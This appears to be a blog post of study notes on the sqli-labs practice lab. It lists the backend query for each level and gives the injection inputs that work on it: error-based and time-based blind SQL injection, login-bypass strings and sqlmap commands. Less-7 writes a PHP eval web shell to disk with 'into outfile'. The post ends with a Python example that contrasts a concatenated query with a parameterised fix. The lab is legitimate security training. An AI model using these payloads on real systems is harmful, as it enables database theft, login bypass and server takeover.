• sqli-labs(Basic)


    Less-1:

    select * from table where id='1' limit 0,1;

    Less-2:

    select * from table where id=1 limit 0,1;

    Less-3:

    select * from table where id=('1') limit 0,1;

    Less-4:

    select * from table where id=("1") limit 0,1;

    Blind injection:

    Less-5:

    select * from table where id='1' limit 0,1;

    and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
    and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

    Less-6:

    select * from table where id="1" limit 0,1;

    Less-7:

    select * from table where id=(('1')) limit 0,1;

    and left(version(),1)=5%23
    show variables like '%secure%';
    my.ini>>secure_file_priv="/"
    union select 1,2,<?php @eval($_POST["x"])?> into outfile *"path"%23

    Less-8:

    select * from table where id='1' limit 0,1;


    Time-based blind injection:

    Less-9:

    select * from table where id='1' limit 0,1;
    and sleep(5)%23
    and if(ascii(substr(database(),0,1))=115,0,sleep(5))%23

    Less-10:

    select * from table where id="1" limit 0,1;


    POST:

    Less-11:

    select * from table where username='admin' and password='admin' limit 0,1;
    admin' or '1'='1#
    1' union select 1,database()#
    sqlmap --form

    Less-12:

    select * from table where username=("admin") and password=("admin") limit 0,1;
    admin") or 1=1#
    admin") or ("1")=("1#


    Blind injection:

    Less-13:

    select * from table where username=('admin') and password=('admin') limit 0,1;
    and extractvalue(1,concat(0x7e,(select version()),0x7e))#

    Less-14:

    select * from table where username="admin" and password="admin" limit 0,1;


    Less-15: (no error output)

    select * from table where username='admin' and password='admin' limit 0,1;

    Less-16:

    select * from table where username=("admin") and password=("admin") limit 0,1;

    Less-17: (uname is filtered)

    update table set password='admin' where username='admin';
    &passwd=admin'and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
    sqlmap --data "uname=admin&passwd=admin&submit=Submit"

    Less-18:

    (uname and passwd are filtered)
    insert into table(a,b,c) values('user-agent','ip','uname');
    'and '1'='1
    'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1
    sqlmap -r xx.txt --technique E

    Less-19:

    insert into table(a,b) values('referer','ip');
    Injection point: the Referer header

    Less-20:

    select * from table where user='cookie' limit 0,1;
    Injection point: the cookie
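
Why the Less-11 login query above is injectable, and the fix, as an added example that is not part of the original notes or of sqli-labs: the same query built by string concatenation and with bound parameters. It assumes Python's `sqlite3` and a constructed `users` table; the function names are hypothetical, and the trailing `#` of the Less-11 input is dropped because `#` is a MySQL comment that SQLite does not have.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the lab's user table.
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table users (id integer primary key, username text, password text)"
    )
    db.executemany(
        "insert into users (username, password) values (?, ?)",
        [("admin", "s3cret"), ("dumb", "dumb")],
    )
    return db


def login_concat(db, username, password):
    # Less-11 shape: input is pasted between the single quotes, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = (
        "select * from users where username='" + username
        + "' and password='" + password + "' limit 0,1"
    )
    return db.execute(sql).fetchone()


def login_param(db, username, password):
    # Same query with placeholders: the driver binds the values as data,
    # so quotes in the input never reach the SQL parser.
    sql = "select * from users where username=? and password=? limit 0,1"
    return db.execute(sql, (username, password)).fetchone()


# Less-11 input from the notes, without the MySQL-only trailing '#'.
PAYLOAD = "admin' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    # Concatenated query parses as: username='admin' OR ('1'='1' AND password=...)
    print("concat, wrong password:", login_concat(db, PAYLOAD, "wrong"))
    print("param,  wrong password:", login_param(db, PAYLOAD, "wrong"))
    print("param,  right password:", login_param(db, "admin", "s3cret"))
```
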

  • Original article: https://www.cnblogs.com/f1veseven/p/13399119.html